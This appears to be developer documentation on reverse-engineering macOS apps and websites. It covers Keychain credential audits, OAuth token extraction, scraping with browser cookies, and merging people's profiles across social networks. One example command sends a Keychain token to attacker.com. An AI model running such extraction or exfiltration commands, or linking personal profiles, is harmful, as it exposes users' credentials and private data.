[ -n "$result" ] && echo "$(basename $app .app) ($dir): $result"
done
done
Real-world example: BusyContacts and Strongbox are Setapp apps — they live in
/Applications/Setapp/ and are invisible to a top-level-only scan.
Local traces:
- `Info.plist` URL scheme (always present while installed)
- Keychain entry with per-account OAuth tokens (e.g. `"svce" = "Mimestream: user@example.com"`)
Pattern 2: macOS Internet Accounts (Account.framework)
When you add a Google account in System Settings → Internet Accounts, macOS registers it at the OS level. This shows up as “macOS” in Google’s authorized apps list. Calendar, Contacts, Mail, and third-party apps that delegate to the system (like BusyContacts for CardDAV) all use this connection.
The accounts live in a SQLite database:
~/Library/Accounts/Accounts4.sqlite (macOS 15+)
~/Library/Accounts/Accounts5.sqlite (some macOS versions)
Detection: Query the ZACCOUNT / ZACCOUNTTYPE tables:
import sqlite3
conn = sqlite3.connect(f"file:{accounts_db}?mode=ro", uri=True)
cursor = conn.cursor()
cursor.execute("""
SELECT a.ZUSERNAME, t.ZIDENTIFIER
FROM ZACCOUNT a
LEFT JOIN ZACCOUNTTYPE t ON a.ZACCOUNTTYPE = t.Z_PK
WHERE t.ZIDENTIFIER = 'com.apple.account.Google'
""")
Requires Full Disk Access — ~/Library/Accounts/ is protected by macOS
TCC. The process reading it (Terminal, VS Code, the AgentOS engine) must have
Full Disk Access granted in System Settings → Privacy & Security.
Local traces:
- Rows in `Accounts4.sqlite` with type `com.apple.account.Google`
- Child accounts for CalDAV, CardDAV, IMAP, SMTP under the parent Google entry
Pattern 3: Server-side OAuth (vendor backend)
Apps like Spark (Readdle) authenticate through their vendor’s backend server. The user authorizes Readdle’s server-side OAuth app in their browser, and the server manages the Google tokens. The local app communicates with the vendor server, not directly with Google.
This pattern is invisible to local scanning. There’s no Google client ID in Info.plist, no OAuth token in the Keychain. The only local traces are:
"svce" = "SparkDesktop" "acct" = "RSMSecureEnclaveKey"
"svce" = "com.readdle.spark.account.auth" "acct" = "RSMSecureEnclaveKey"
These are Secure Enclave keys for the app’s own auth — they don’t contain Google tokens, they protect the app’s session with Readdle’s servers.
Detection: No reliable local detection. The only way to see these is to
query Google’s OAuth management API or check myaccount.google.com/permissions
directly.
Ghost entries: When server-side OAuth apps are uninstalled, the Keychain entries remain but the app bundle is gone. The Google authorization also persists (the vendor server still has the tokens) until the user explicitly revokes it in Google’s settings.
Summary
| Pattern | Examples | How to detect | Shows in Google as |
|---|---|---|---|
| Native PKCE | Mimestream, BusyContacts, Strongbox | Info.plist URL scheme scan | App name |
| macOS Internet Accounts | Calendar, Contacts, Mail | Accounts4.sqlite (needs FDA) | “macOS” |
| Server-side OAuth | Spark, potentially others | Not locally detectable | Vendor name (Readdle) |
Finding Google OAuth Client IDs (Native PKCE)
The detailed walkthrough for Pattern 1 above. The registered URL scheme in
Info.plist encodes the client ID:
plutil -p /Applications/SomeApp.app/Contents/Info.plist | grep googleusercontent
Client secrets in binaries
Google OAuth client secrets for desktop apps begin with GOCSPX-. You can
search binaries with:
strings /Applications/SomeApp.app/Contents/MacOS/SomeApp | grep "GOCSPX-"
However, Google explicitly treats desktop app client secrets as non-secret. The Google docs say: “The client secret is not secret in this context.” Desktop apps are “public clients” — the secret is in the binary, reversible, and Google knows it.
What actually protects the user is:
- The refresh token being user-specific and Keychain-stored
- PKCE preventing one-time auth code interception (see below)
- Google’s revocation flow (`myaccount.google.com/permissions`)
Full Credential Audit
To audit everything sensitive on the machine:
# 1. All non-Apple Keychain entries (service + account names)
security dump-keychain 2>/dev/null \
| grep '"svce"\|"acct"' \
| grep -iv "apple\|icloud\|cloudkit\|wifi\|bluetooth\|cert\|nsurl\|networkservice\|airportd\|safari\|webkit\|xpc\|com\.apple\." \
| sort -u
# 2. Apps with Google OAuth client IDs (all install locations)
for dir in /Applications /Applications/Setapp ~/Applications; do
[ -d "$dir" ] || continue
for app in "$dir"/*.app; do
r=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
[ -n "$r" ] && echo "$(basename $app .app) ($dir): $r"
done
done
# 3. Apps using the Electron Safe Storage pattern
security dump-keychain 2>/dev/null | grep "Safe Storage"
# 4. Apps with direct token entries
security dump-keychain 2>/dev/null \
| grep '"svce"' \
| grep -iE "token|auth|key|secret|credential|oauth|refresh|access"
Extracting a Specific Token
Once you know the service name and account name from the audit:
# Returns the raw value (password field)
security find-generic-password -s "SERVICE_NAME" -a "ACCOUNT_NAME" -w
For apps that store binary plists (like Mimestream):
security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w
# Returns hex-encoded binary plist
# Decode: xxd -r -p <<< "$HEX" | plutil -convert json - -o -
This is exactly how the mimestream.credential_get skill works — command: step
runs the security command, plist: step decodes the binary plist.
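The decode step can also be done in Python with the stdlib, mirroring the `xxd | plutil` pipeline above (`decode_keychain_plist` is a hypothetical helper name):

```python
import plistlib


def decode_keychain_plist(hex_blob: str) -> dict:
    """Decode the hex-encoded binary plist that `security ... -w` prints."""
    return plistlib.loads(bytes.fromhex(hex_blob.strip()))
```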
Keychain ACLs — Why Most Items Are Readable
macOS Keychain has two access levels:
| Level | Behavior | Who uses it |
|---|---|---|
| No ACL (default) | Any process running as the same user can read silently | Most apps |
| ACL-protected | macOS prompts “Allow / Deny / Always Allow” | 1Password, some system services |
The ACL-protected dialog looks like:
"SomeApp" wants to use your confidential information stored in "item name" in your keychain.
[Deny] [Allow] [Always Allow]
Most apps don’t set ACLs. The Keychain is protected against:
- Other user accounts on the same machine
- Sandboxed App Store apps (they can only access items they created)
- Remote attackers
It is not protected against:
- Processes running as the same user (same UID)
- Malicious code injected via supply chain attacks
- Any script or tool run in your Terminal session
How the Keychain Is Actually Encrypted
The login keychain (~/Library/Keychains/login.keychain-db) is an encrypted
SQLite file, but your processes never decrypt it directly. The OS handles this
through a privileged daemon called securityd.
Key derivation chain:
Login password
↓ PBKDF2 (salt stored in the .keychain-db file)
Master encryption key ←── held in securityd memory after login
↓ wraps
Per-item encryption keys
↓ decrypts
Item plaintext values
When you log in, macOS unlocks the keychain and securityd holds the master
key in memory for the session. The security CLI and Security.framework API
talk to securityd — they never read raw bytes from the file. securityd
checks ACLs, then hands back plaintext to any authorized caller.
Why your session already has full access: No password is needed at runtime
because securityd has the master key in memory from login. Any process you
launch inherits your UID, which is all securityd checks for no-ACL items.
The offline copy attack: Because PBKDF2 is deterministic (same
password + same salt → same master key, on any machine), copying the
.keychain-db file and running security unlock-keychain -p "password" <file>
decrypts it fully — no active session needed. File + password = complete access.
Secure Enclave — The Real Hardware Boundary
Touch ID-gated items (kSecAccessControlUserPresence) use a fundamentally
different mechanism: the Secure Enclave coprocessor.
Secure Enclave key ←── hardware-bound, NEVER extractable, tied to this chip
↓ wraps
Item encryption key (stored in .keychain-db, but useless without the Enclave key)
↓ decrypts
Item plaintext value
The Enclave key cannot be exported, dumped, or migrated. Touch ID just proves “user is present” to the Enclave, which unwraps the key inside hardware and returns the plaintext. This is the only mechanism where copying the file + knowing the password is not sufficient — the Enclave key lives on a specific chip and nowhere else.
Access matrix:
| Item type | Active session (no password) | File copy + password | Different machine |
|---|---|---|---|
| No ACL | ✅ silent | ✅ works | ✅ works |
| App ACL | ✅ with prompt | ✅ works | ✅ works |
| Touch ID (`UserPresence`) | ✅ prompts Touch ID | ❌ | ❌ never |
The Secure Enclave is the only real hardware-enforced wall. Everything else
is securityd policy, which any same-user process can request through.
Supply Chain Attack Surface
If malicious code runs as the user (e.g. via a compromised npm package or a malicious skill), it can silently read any non-ACL Keychain item:
# A malicious command step in a skill.yaml could do:
security find-generic-password -s "cursor-refresh-token" -w | \
curl -sX POST https://attacker.com -d @-
What’s reachable in a typical developer’s Keychain:
| Token | What it grants | Lifetime |
|---|---|---|
| Google refresh token (Mimestream) | Read/send email, calendar | Until revoked |
| GitHub CLI token (`gh:github.com`) | Full repo access | Until revoked |
| Cursor tokens | IDE session, code context | Until expired/revoked |
| Electron Safe Storage key | Decrypt all browser-stored credentials | Until app reinstalled |
| Slack Safe Storage key | Decrypt all local Slack data | Until app reinstalled |
Implication for AgentOS: Skills with command: steps can execute arbitrary
shell commands. Before a public skill registry exists, command: steps in
community skills should be audited for Keychain access. See
docs/specs/_roadmap.md — skill
sandboxing is a listed backlog item.
PKCE — What It Actually Protects
PKCE (Proof Key for Code Exchange) is required for modern desktop OAuth. It is narrower than it sounds.
What it protects: One-time authorization code interception. During the ~10-second window between “user clicks Approve” and “app exchanges the code”, a process could theoretically grab the code off the localhost redirect (port squatting). PKCE makes that useless because the code can’t be exchanged without the verifier, which lives only in the legitimate app’s memory for that window.
What it does not protect: The refresh token sitting in the Keychain. Once the initial auth is done, PKCE is irrelevant. The refresh token is the real long-lived credential and it’s protected only by Keychain access controls (see above).
PKCE protects: PKCE does NOT protect:
────────────── ──────────────────────
auth code (10 sec) refresh token (months)
during initial login ongoing token renewal
The verifier is never written to disk — it lives in memory for the duration of the login flow and is discarded. This is by design: it only needs to survive the seconds between opening the browser and catching the redirect.
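For reference, generating the verifier/challenge pair is a few lines (the S256 method from RFC 7636; a sketch):

```python
import base64
import hashlib
import secrets


def make_pkce_pair() -> tuple[str, str]:
    # Verifier: URL-safe randomness, kept only in memory during the login flow
    verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
    # Challenge: base64url(SHA256(verifier)), sent with the initial authorize request
    digest = hashlib.sha256(verifier.encode()).digest()
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode()
    return verifier, challenge
```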
See Also
- Electron deep dive — Safe Storage key extraction, asar unpacking
- Auth & Credentials overview — web auth, CSRF, cookie patterns
- Desktop Apps — app bundle structure, Application Support
- `skills/mimestream/skill.yaml` — reference implementation of Keychain-based OAuth credential extraction
Reverse Engineering — Content Extraction from HTML
When there’s no API, no GraphQL, no Apollo cache — just server-rendered HTML
behind a login wall. This doc covers the patterns for authenticated HTML scraping
with agentos.http + lxml.
This is Layer 4 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport — getting a response at all
- Layer 2: Discovery — 2-discovery — finding structured data in bundles
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
- Layer 4: Content (this file) — extracting data from HTML when there is no API
- Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
When You Need This Layer
Not every operation needs HTML scraping. The same site often has a mix:
| Data type | Approach | Example |
|---|---|---|
| Public catalog data | GraphQL / Apollo cache (Layer 2) | Goodreads book details, reviews, search |
| User-scoped data behind login | HTML scraping (this doc) | Goodreads friends, shelves, user’s books |
| Write operations | API calls with session tokens | Rating a book, adding to shelf |
Rule of thumb: Check for structured APIs first (Layer 2). Only fall back to HTML scraping when the data is exclusively server-rendered behind authentication.
Skill Architecture: Two Modules
When a skill needs both public API access and authenticated scraping, split into two Python modules:
skills/mysite/
readme.md # Skill descriptor — operations point to either module
public_graph.py # Public API / GraphQL / Apollo — no cookies needed
web_scraper.py # Authenticated HTML scraping — needs cookies
The readme declares separate connections for each:
connections:
graphql:
description: "Public API — key auto-discovered"
web:
description: "User cookies for authenticated data"
auth:
type: cookies
domain: ".mysite.com"
optional: true
label: MySite Session
Operations reference the appropriate connection:
operations:
search_books: # public
connection: graphql
python:
module: ./public_graph.py
function: search_books
args: { query: .params.query }
list_friends: # authenticated
connection: web
python:
module: ./web_scraper.py
function: run_list_friends
params: true
Cookie Flow: connection: web → Python
The entire cookie lifecycle is handled by agentOS. The Python script never touches browser databases or knows which browser the cookies came from.
How it works
- Skill declares
connection: webwithcookies.domain: ".mysite.com" - Executor finds an installed cookie provider (
brave-browser,firefox, etc.) - Provider extracts + decrypts cookies from the local browser database
- Executor injects them into params as
params.auth.cookies(aCookie:header string) - Python reads them and passes to
http.client()
Python side
def _cookie(ctx: dict) -> str | None:
"""Extract cookie header from AgentOS-injected auth."""
c = (ctx.get("auth") or {}).get("cookies") or ""
return c if c else None
def _require_cookies(cookie_header, params, op_name):
cookie_header = cookie_header or (params and _cookie(params))
if not cookie_header:
raise ValueError(f"{op_name} requires session cookies (connection: web)")
return cookie_header
params: true context structure
When a Python executor uses params: true, the function receives the full
wrapped context as a single params dict:
{
"params": { "user_id": "123", "page": 1 },
"auth": { "cookies": "session_id=abc; token=xyz" }
}
Use a helper to read user params from either nesting level:
def _p(d: dict, key: str, default=None):
"""Read from params sub-dict or top-level."""
p = (d.get("params") or d) if isinstance(d, dict) else {}
return p.get(key, default) if isinstance(p, dict) else default
HTTP Client: Shared Across Pages
Create one http.client() per operation and reuse it across paginated requests.
This keeps the TCP/TLS connection alive and avoids per-request overhead.
from agentos import http
def _client(cookie_header: str | None) -> http.Client:
headers = http.headers(waf="standard", accept="html")
if cookie_header:
headers["Cookie"] = cookie_header
return http.client(headers=headers)
# Usage
with _client(cookie_header) as client:
for page in range(1, max_pages + 1):
status, html = _fetch(client, url.format(page=page))
if not _has_next(html):
break
Pagination
Default: fetch all pages
Make page=0 the default, meaning “fetch everything.” When the caller passes
page=N, return only that page. This gives callers control without requiring
them to implement their own pagination loop.
def list_friends(user_id, page=0, cookie_header=None, *, params=None):
if page > 0:
# Single page
return _parse_one_page(url.format(page=page), cookie_header)
# Auto-paginate
all_items = []
seen = set()
with _client(cookie_header) as client:
for p in range(1, MAX_PAGES + 1):
status, html = _fetch(client, url.format(page=p))
items = _parse_page(html)
for item in items:
if item["id"] not in seen:
seen.add(item["id"])
all_items.append(item)
if not items or not _has_next(html):
break
return all_items
Detecting “next page”
Look for pagination controls rather than guessing based on result count:
def _has_next(html_text: str) -> bool:
return bool(
re.search(r'class="next_page"', html_text) or
re.search(r'rel="next"', html_text)
)
Safety limits
Always cap auto-pagination (MAX_PAGES = 20). A user with 5,000 books shouldn’t
trigger 200 sequential requests in a single tool call.
Deduplication
Sites often include the user’s own profile in friend lists, or repeat items across page boundaries. Always deduplicate by ID:
seen: set[str] = set()
for item in page_items:
if item["id"] not in seen:
seen.add(item["id"])
all_items.append(item)
HTML Parsing Patterns
Use data attributes over visible text
Data attributes are more stable than CSS classes or visible text:
# Good: data-rating is the source of truth
stars = row.select_one(".stars[data-rating]")
rating = int(stars["data-rating"]) if stars else None
# Bad: fragile, depends on star rendering
rating_el = row.select_one(".staticStars")
Fallback selector chains
Large sites use different HTML structures across pages, A/B tests, and regions. Instead of matching a single selector, define a priority-ordered list and take the first match. This makes parsers resilient to markup changes.
ORDER_ID_SEL = [
"[data-component='orderId']",
".order-date-invoice-item :is(bdi, span)[dir='ltr']",
".yohtmlc-order-id :is(bdi, span)[dir='ltr']",
":is(bdi, span)[dir='ltr']",
]
ITEM_PRICE_SEL = [
".a-price .a-offscreen",
"[data-component='unitPrice'] .a-text-price :not(.a-offscreen)",
".yohtmlc-item .a-color-price",
]
def _select_one(tag, selectors: list[str]):
for sel in selectors:
result = tag.select_one(sel)
if result:
return result
return None
def _select(tag, selectors: list[str]) -> list:
for sel in selectors:
result = tag.select(sel)
if result:
return result
return []
Put the most specific, modern selector first (e.g. data-component attributes)
and the broadest fallback last. This pattern works especially well for sites
like Amazon that ship multiple front-end variants simultaneously.
Reference: skills/amazon/amazon.py — all order/item selectors use this pattern.
Structured table pages (Goodreads /review/list/)
Many sites render user data in HTML tables with class-coded columns. Each <td>
has a field class you can target directly:
rows = soup.select("tr.bookalike")
for row in rows:
book_id = row.get("data-resource-id")
title = row.select_one("td.field.title a").get("title")
author = row.select_one("td.field.author a").get_text(strip=True)
rating = row.select_one(".stars[data-rating]")["data-rating"]
date_added = row.select_one("td.field.date_added span[title]")["title"]
Extraction helpers
Write small focused helpers for each field type rather than inline parsing:
def _extract_date(row, field_class):
td = row.select_one(f"td.field.{field_class}")
if not td:
return None
span = td.select_one("span[title]")
if span:
return span.get("title") or span.get_text(strip=True)
return None
def _extract_rating(row):
stars = row.select_one(".stars[data-rating]")
if stars:
val = int(stars.get("data-rating", "0"))
return val if val > 0 else None
return None
Login detection and SESSION_EXPIRED
Check early and fail fast when cookies are invalid. Use the SESSION_EXPIRED:
prefix convention so the engine can automatically retry with a different cookie
provider (see connections.md):
def _is_login_redirect(resp, body: str) -> bool:
    if "ap/signin" in str(resp.url):
        return True
    if 'name="signIn"' in body[:5000]:  # literal attribute from the login form markup
        return True
    return "ap_email" in body[:3000] or "signIn" in body[:3000]
# In any authenticated operation:
if _is_login_redirect(resp, body):
raise RuntimeError(
"SESSION_EXPIRED: Amazon redirected to login — session cookies are expired or invalid."
)
The SESSION_EXPIRED: prefix triggers the engine’s provider-exclusion retry:
the engine marks the current cookie provider as stale, excludes it, and retries
with the next-best provider. This handles the common case where one browser has
stale cookies but another has a fresh session.
Convention: SESSION_EXPIRED: <human-readable reason> for stale auth. Any
other exception message means a real failure — the engine won’t retry with
different credentials.
AJAX Endpoints for Dynamic Content
Not everything is in the HTML. Many sites load sections dynamically via internal AJAX endpoints that return HTML fragments or JSON. These are often easier to parse than the full page and more stable across redesigns.
Discovering AJAX endpoints
Use Playwright’s capture_network while interacting with the page:
capture_network { url: "https://www.amazon.com/auto-deliveries", pattern: "**/ajax/**", wait: 5000 }
Or inject a fetch interceptor and click the relevant UI element — the interceptor captures the endpoint, params, and response shape.
Example: Amazon Subscribe & Save
Amazon’s subscription management page loads content via an AJAX endpoint that returns a JSON payload with embedded HTML:
from lxml import html as lhtml
resp = client.get(
f"{BASE}/auto-deliveries/ajax/subscriptionList",
params={"pageNumber": 0},
headers={
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{BASE}/auto-deliveries",
},
)
data = resp.json()
html_fragment = data.get("subscriptionListHtml", "")
doc = lhtml.fromstring(html_fragment)
Key headers for AJAX: Always include X-Requested-With: XMLHttpRequest and
a valid Referer. Many servers check these to distinguish AJAX from direct
navigation.
When to look for AJAX endpoints
| Signal | Likely AJAX |
|---|---|
| Content appears after page load (spinner, lazy-load) | Yes |
| URL changes without full page reload | Yes — check for pushState + fetch |
| Tab/section switching within a page | Yes — each tab may have its own endpoint |
| Data differs between “View Source” and DevTools Elements | Yes — JS loaded it after |
Reference: skills/amazon/amazon.py subscriptions() — AJAX endpoint for
Subscribe & Save management.
Adapter Null Safety
When a skill’s adapter maps nested collections (like shelves on an account),
not every operation returns those nested fields. Use jaq // [] fallback to
prevent null iteration errors:
adapters:
account:
id: .user_id
name: .name
shelves:
shelf[]:
_source: '.shelves // []' # won't blow up when shelves is absent
id: .shelf_id
name: .name
Data Validation Checklist
After building a scraper, cross-reference against the live site:
| Check | How |
|---|---|
| Total count | Compare your result count to what the site header says (“Showing 1-30 of 69”) |
| Unique IDs | Deduplicate and compare — off-by-one usually means a deleted/deactivated account |
| Rating counts | Count items with non-null ratings vs. the site’s “X ratings” display |
| Review counts | Count items with actual review text vs. the site’s “X reviews” display |
| Field completeness | Spot-check dates, ratings, authors against individual entries on the site |
| Shelf math | Sum shelf counts and compare to “All (N)” — they may diverge (Goodreads shows 273 but serves 301) |
Testing Methodology
1. Save cookies locally for development
Extract cookies once and save to a JSON file for local testing:
# From agentOS:
# run({ skill: "brave-browser", tool: "cookie_get", params: { domain: ".mysite.com" } })
# Or manually build the file:
# scripts/test_cookies.json
[
{"name": "session_id", "value": "abc123", "domain": ".mysite.com"},
...
]
2. Test parsers against real pages
Hit the live site with agentos.http and verify parsing before wiring to agentOS:
import json

with open("scripts/test_cookies.json") as f:
    cookies = json.load(f)
cookie_header = "; ".join(f'{c["name"]}={c["value"]}' for c in cookies)
friends = list_friends("12345", cookie_header=cookie_header)
print(f"Got {len(friends)} friends")
3. Test through agentOS MCP
Once local parsing works, test the full pipeline:
npm run mcp:call -- --skill mysite --tool list_friends \
--params '{"user_id":"12345"}' --verbose
4. Mark cookie-dependent tests as write mode
Operations that require live cookies should use test.mode: write so they’re
skipped in automated smoke tests but can be run manually with --write:
test:
  mode: write
  fixtures:
    user_id: "12345"
Real-World Examples
| Skill | What’s scraped | Key patterns | Reference |
|---|---|---|---|
| skills/amazon/ | Orders, products, subscriptions, account identity — all from server-rendered HTML and AJAX | Fallback selector chains, Siege cookie stripping, session warming, AJAX endpoints, SESSION_EXPIRED convention | amazon.py |
| skills/goodreads/ | People (friends, following, followers), books, reviews, groups, quotes, rich profiles — all from HTML | Structured table parsing, data attributes, pagination, dedup | web_scraper.py |
For social-network-specific modeling patterns (person vs account, relationship types, cross-platform identity), see 5-social.
Reverse Engineering — Social Network Patterns
How to model people, relationships, and social data across platforms like Goodreads, Twitter/X, MySpace, LinkedIn, Instagram, etc.
This is Layer 5 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport — getting a response at all
- Layer 2: Discovery — 2-discovery — finding structured data in bundles
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
- Layer 4: Content — 4-content — extracting data from HTML when there is no API
- Layer 5: Social Networks (this file) — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
Core Principle: People First, Accounts Second
Every social platform has users. But the same person exists across many platforms. The graph should model this in two layers:
| Entity | What it represents | Cross-platform? |
|---|---|---|
| person | A real human being | Yes — mergeable across platforms |
| account | Their profile on one platform | No — platform-specific |
A person has accounts. An account belongs to a person.
adapters:
  person:
    id: .user_id
    name: .name
    image: .photo_url
    location: .location
    data.gender: .gender
    data.age: .age
    data.birthday: .birthday
    data.website: .website
    has_account:
      account:
        id: .user_id
        name: .name
        handle: .handle
        url: .profile_url
        image: .photo_url
Why this matters: When you later build Twitter and find the same person (by name, website, or explicit cross-link), you can merge the person entities while keeping both accounts distinct. The person is the anchor.
Social Relationship Types
Every social network has some subset of these relationship patterns:
Symmetric (mutual)
Both parties agree. The relationship is bidirectional.
| Relationship | Examples |
|---|---|
| friends | Facebook, Goodreads, MySpace |
Operation pattern: list_friends(user_id) → person[]
Asymmetric (directed)
One party follows, the other may or may not follow back.
| Relationship | Examples |
|---|---|
| following | Twitter, Instagram, Goodreads |
| followers | Twitter, Instagram, Goodreads |
Operation pattern: two separate operations with different directions.
list_following:
  description: People this user follows
  returns: person[]
list_followers:
  description: People following this user
  returns: person[]
Group membership
User belongs to a group/community.
| Relationship | Examples |
|---|---|
| member_of | Goodreads groups, Facebook groups, Reddit subreddits, Discord servers |
list_groups:
  returns: group[]
Profile Depth: Light vs Rich
Social operations return people at two levels of depth:
Light (from list operations)
When you scrape a friends list or followers page, you get limited data per person:
{
  "user_id": "10000001",
  "name": "Alex Reader",
  "photo_url": "https://...",
  "location": "Berlin",
  "books_count": 414,
  "friends_count": 138
}
This is what list_friends, list_following, list_followers return.
Enough to create the person entity and the relationship edge.
Rich (from profile scrape)
When you scrape an individual profile page, you get the full picture:
{
  "user_id": "10000001",
  "name": "Alex Reader",
  "handle": "alexreader",
  "photo_url": "https://...",
  "gender": "...",
  "age": 32,
  "birthday": "...",
  "location": "Berlin, Germany",
  "website": "https://example.com",
  "about": "...",
  "interests": "...",
  "joined_date": "January 2015",
  "ratings_count": 159,
  "avg_rating": "3.82",
  "friends_count": 138,
  "favorite_books": [...],
  "currently_reading": [...],
  "favorite_genres": [...]
}
This is what get_person(user_id) returns.
Pattern: Always provide both. The light operations populate the graph with
stubs. The rich operation fills them in when you need the detail. The adapter
handles both — missing fields are just null.
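A sketch of that stub-then-fill merge (field names mirror the examples above; the merge policy is illustrative, not a fixed graph rule):

```python
def merge_person(stub: dict, rich: dict) -> dict:
    """Overlay a rich profile onto a light stub; rich data wins when non-null."""
    merged = dict(stub)
    for key, value in rich.items():
        if value is not None:
            merged[key] = value
    return merged

stub = {"user_id": "10000001", "name": "Alex Reader", "location": "Berlin"}
rich = {"user_id": "10000001", "handle": "alexreader",
        "location": "Berlin, Germany", "website": "https://example.com"}
person = merge_person(stub, rich)
```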
Authors Are People Too
On platforms with content creators (Goodreads authors, Twitter blue-checks, YouTube channels), the creators are people with special roles. Model them as:
- person entity (they’re a human being)
- author/creator entity (their creative identity)
- account entity (their platform presence)
On Goodreads, an author appears in multiple contexts:
| Context | How we encounter them |
|---|---|
| Book’s written_by relationship | author entity with ID and URL |
| list_following results | person entity (they follow authors) |
| Quote attribution | author entity |
| Author profile page | full author entity with books |
The key insight: extract real author IDs everywhere, not just name strings.
When a book list shows “Christie, Agatha” as a link to /author/show/123715,
capture the ID so the graph can connect the book → author → their other books.
author_el = row.select_one("td.field.author a")
if author_el:
    href = author_el.get("href", "")
    m = re.search(r"/author/show/(\d+)", href)
    if m:
        author_id = m.group(1)
        author_url = _abs_url(href)
Also fix name ordering — many platforms store names as “LastName, FirstName” in table views:
def _flip_name(name: str) -> str:
    if "," in name:
        parts = [p.strip() for p in name.split(",", 1)]
        if len(parts) == 2 and parts[1]:
            return f"{parts[1]} {parts[0]}"
    return name
Content People Create
Social platforms aren’t just about connections — people create content. Each platform has its own content types that should map to entities:
| Platform | Content types | Entity mapping |
|---|---|---|
| Goodreads | Books read, reviews, ratings, quotes | book, review, quote |
| Twitter/X | Tweets, retweets, likes | post, engagement |
| MySpace | Music, blog posts, comments | track, post, comment |
| Instagram | Photos, stories, reels | media, story |
| LinkedIn | Posts, articles, endorsements | post, article |
The person’s relationship to content matters:
# Things a person created
person → wrote → review
person → posted → post
# Things a person engaged with
person → rated → book (with rating value)
person → liked → quote
person → saved → book (to shelf)
# Things attributed to a person
quote → attributed_to → author
book → written_by → author
Profile Page Parsing Patterns
Social profile pages follow remarkably similar structures across platforms. Common patterns:
Info box / details section
Most profiles have a key-value info section:
titles = soup.select(".infoBoxRowTitle")
items = soup.select(".infoBoxRowItem")
info = {}
for t, v in zip(titles, items):
    label = clean(t.get_text()).lower()
    value = clean(v.get_text())
    info[label] = value
Stats bar
Ratings, posts, followers — usually near the top:
stats_text = clean(stats_el.get_text())
ratings = re.search(r"([\d,]+)\s+ratings?", stats_text)
avg = re.search(r"\(([\d.]+)\s+avg\)", stats_text)
Section headers → content blocks
Profile pages have named sections (favorite books, currently reading, groups). The header-to-content relationship varies by platform:
# Pattern 1: Header is inside a container, content is a sibling div
for hdr in soup.select("h2.brownBackground"):
    parent_box = hdr.find_parent("div", class_="bigBox")
    body = parent_box.select_one(".bigBoxBody") if parent_box else None

# Pattern 2: Header IS the container, content follows
for hdr in soup.select(".sectionHeader"):
    body = hdr.find_next_sibling()

# Pattern 3: Header + content share a parent
for section in soup.select(".profileSection"):
    title = section.select_one("h3")
    content = section.select_one(".sectionContent")
Always check the actual DOM structure — don’t assume.
Pagination for Social Lists
Social lists (friends, followers, following) almost always paginate. Key patterns from Goodreads that will apply elsewhere:
Auto-pagination with page=0
def list_friends(user_id, page=0, ...):
    """page=0 means fetch all pages automatically."""
    if page > 0:
        items, _ = _fetch_single_page(page)
        return items
    all_items = []
    seen = set()
    for p in range(1, MAX_PAGES + 1):
        items, html_text = _fetch_single_page(p)  # parsed items + raw HTML
        new = [i for i in items if i["user_id"] not in seen]
        all_items.extend(new)
        seen.update(i["user_id"] for i in new)
        if not _has_next(html_text):
            break
    return all_items
Next-page detection
def _has_next(html_text: str) -> bool:
    return 'class="next_page"' in html_text or 'rel="next"' in html_text
Safety limits
Always cap pagination to prevent infinite loops:
MAX_PAGES = 50
Cross-Platform Identity Signals
When building skills for multiple social networks, look for identity signals that help merge person entities across platforms:
| Signal | Reliability | Example |
|---|---|---|
| Explicit cross-link | High | Website URL in bio pointing to another profile |
| Same handle | Medium | @jcontini on both Twitter and Goodreads |
| Same name + location | Low | “Joe Contini, Austin TX” |
| Same profile photo | Medium | Image similarity matching |
| Email (if available) | High | Unique identifier |
For now, just capture everything. The website field on a person’s profile
is particularly valuable — it often links to a personal site that aggregates
all their social profiles.
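One hedged sketch of capturing that signal: normalize website URLs so the same personal site compares equal across profiles. The rules here (drop scheme, www., trailing slash) are illustrative, not a matching algorithm:

```python
from urllib.parse import urlparse

def normalize_website(url: str) -> str:
    """Strip scheme, leading www., and trailing slash for comparison."""
    parsed = urlparse(url if "://" in url else f"https://{url}")
    host = parsed.netloc.lower().removeprefix("www.")
    return f"{host}{parsed.path.rstrip('/')}"

# A bio link and a bare domain now compare equal:
same = normalize_website("https://www.example.com/") == normalize_website("example.com")
```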
Checklist for a New Social Network Skill
When building a skill for a new social platform:
- Identify the entity types — what do people create, consume, and engage with?
- Map relationships — friends? followers? groups? what content do they produce?
- Model as person → account — not just accounts
- Light + rich profiles — list operations for stubs, get_person for detail
- Extract real IDs everywhere — not just name strings; follow links for IDs
- Capture cross-platform signals — website, handle, email
- Auto-paginate social lists — friends, followers, etc. are always paginated
- Handle name formatting — “LastName, FirstName” flipping, Unicode, etc.
- Look for section-based profile data — favorite X, currently Y, groups, etc.
- Test with a real profile — verify data richness against what you see in the browser
Real-World Examples
| Skill | Social patterns used | Reference |
|---|---|---|
| skills/goodreads/ | person → account, friends, following/followers, groups, quotes, authors as people, favorite books, currently reading, profile scraping | web_scraper.py |
| Future: skills/myspace/ | person → account, friends, followers, music, blog posts | — |
| Future: skills/twitter/ | person → account, following/followers, tweets, likes, retweets | — |
Reverse Engineering — macOS Desktop & Electron Apps
When the target is a desktop app (Slack, Notion, Granola, VS Code, etc.) that stores data locally and syncs with a backend. The API is often undocumented; the app itself is your best source.
This is Layer 6 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport — TLS, headers, WAF bypass
- Layer 2: Discovery — 2-discovery — web bundles, Apollo cache
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions
- Layer 4: Content — 4-content — HTML scraping
- Layer 5: Social Networks — 5-social — people, relationships
- Layer 6: Desktop Apps (this file) — macOS, Electron, local state, unofficial APIs
- electron.md — Electron deep dive: asar extraction, token files, CrossAppAuth, feature flags
When to Use This Approach
| Target | Approach |
|---|---|
| Web app (browser-based) | Layers 1–4 — bundles, GraphQL, cookies |
| Desktop app with local data | This doc — app bundle + Application Support |
